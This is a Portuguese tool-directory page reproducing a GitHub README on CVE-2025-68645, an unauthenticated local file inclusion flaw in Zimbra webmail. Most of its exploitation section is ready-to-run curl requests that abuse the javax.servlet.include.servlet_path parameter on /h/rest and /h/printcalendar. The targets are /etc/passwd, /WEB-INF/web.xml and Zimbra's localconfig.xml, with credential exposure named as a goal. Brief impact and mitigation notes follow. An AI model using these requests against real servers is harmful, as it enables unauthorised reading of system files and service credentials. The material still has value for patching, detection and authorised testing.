Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-68645 — CVE-2025-68645 | Kitploit
Ferramentas/GitHubGitHub/0xblackash/cve-2025-68645
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHub0xblackash/cve-2025-68645

CVE-2025-68645

CVE-2025-68645

Ver Repositório
21há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2025-68645 - Análise de Inclusão de Arquivo Local (LFI) no Zimbra

zimbra

Vulnerability Target Severity Status


📌 Visão Geral

Este documento descreve uma vulnerabilidade de Inclusão de Arquivo Local (LFI) que afeta o Zimbra Collaboration Suite.

O problema surge do tratamento inadequado do seguinte parâmetro:

root@kitploit:~
/h/*?javax.servlet.include.servlet_path=

Isso permite que um usuário não autenticado acesse recursos internos da aplicação.


🔍 Detalhes da Vulnerabilidade

  • Tipo: Inclusão de Arquivo Local (LFI)
  • Acesso: Não autenticado
  • Componente Afetado: Webmail (Interface Clássica)
  • Vetor de Ataque: Manipulação de requisição HTTP
Baixar ferramenta

🧪 Verificação Inicial

Requisição de teste:

root@kitploit:~
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

▶️ Demonstração:

cve-2025-68645
cve-2025-68645 1

✅ Resultado

  • Arquivo interno recuperado com sucesso
  • Confirma tratamento inadequado de entrada

⚙️ Comportamento do Endpoint

Múltiplos endpoints processam o parâmetro vulnerável de forma diferente.

Exemplo:

root@kitploit:~
/h/printcalendar?javax.servlet.include.servlet_path=...

Observações:

  • Comportamento de acesso a arquivos mais consistente
  • Melhor confiabilidade de resposta em comparação com /h/rest

🚧 Consideração sobre TLS

Problema

root@kitploit:~
SSL: certificate subject name does not match target host

Solução Alternativa

root@kitploit:~
curl -k "https://TARGET/..."

🚀 Exemplos de Exploração

📂 Acessar Recurso Web Interno

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"

📂 Tentar Acesso a Arquivo do Sistema

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"

🔐 Acessar Configuração da Aplicação

root@kitploit:~
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"

Exposição Potencial:

  • Credenciais de serviço
  • Configuração interna
  • Detalhes da infraestrutura

🧠 Impacto

A exploração bem-sucedida pode levar a:

  • Divulgação de arquivos de configuração sensíveis
  • Exposição de serviços e arquitetura internos
  • Vazamento de credenciais
  • Aumento do risco de comprometimento adicional

🛡️ Mitigação

  • Atualizar o Zimbra para versões corrigidas

  • Restringir o acesso a endpoints vulneráveis

  • Monitorar logs em busca de parâmetros suspeitos:

    • javax.servlet.include.servlet_path
  • Implantar regras de WAF para bloquear padrões maliciosos


💡 Principais Conclusões

  • Falhas de validação de entrada podem expor recursos internos
  • Diferentes endpoints podem se comportar de forma inconsistente
  • Arquivos de configuração frequentemente contêm informações críticas
  • A detecção precoce reduz significativamente o risco

🏴 Conclusão

  • Vulnerabilidade confirmada: CVE-2025-68645
  • A exploração permite acesso não autorizado a arquivos
  • A correção imediata é fortemente recomendada

🔐 A Segurança Importa